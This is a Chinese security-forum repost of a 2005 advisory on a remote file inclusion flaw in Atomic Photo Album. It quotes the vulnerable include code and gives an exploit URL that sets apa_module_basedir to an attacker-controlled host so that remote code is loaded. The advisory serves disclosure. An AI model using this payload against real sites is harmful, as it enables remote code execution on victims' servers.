[转载]Atomic相册apa_phpinclude.inc.php远程文件包含漏洞及分析

EvilOctal

团队执行官

Rank: 8 Rank: 8

E.S.T社区执行帐号

帖子: 9833
精华: 769
积分: 40415
阅读权限: 200
性别: 男
在线时间: 3978 小时
注册时间: 2004-7-4
最后登录: 2008-10-11

发短消息
加为好友
当前离线

楼主大中小发表于 2005-7-27 04:36 只看该作者

[转载]Atomic相册apa_phpinclude.inc.php远程文件包含漏洞及分析

文章作者：pc_labs

Atomic Photo Album (APA) apa_phpinclude.inc.php remote file include :>
------------------------------------------------------------
Name: Atomic Photo Album (APA)
Version: all
Homepage: http://atomicpa.sourceforge.net/

Author: pc_labs / lwdz - RandomHero
Date: 20 July 2005
------------------------------------------------------------
------------------------------------------------------------

Vulnerable code in : apa_phpinclude.inc.php

require_once("apa_authadm.inc.php");
else
require_once("apa_auth.inc.php");
....else{
require_once("$apa_module_basedir/apa_config.inc.php");
...

?>

------------------------------------------------------------

Exploit:

http://[victim]/[dir]/apa_phpinclude.inc.php?apa_module_basedir=http://[h4x0r_b0x]/

--------------------------------------------------------

Fix and Vendor status:

Vendor has been notified.

曾几何时，有人对我说：装B遭雷劈。我说：去你妈的。于是，这个人又对我说：如果再说脏话，上帝会惩罚你的。我说：我操上帝。结论：彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››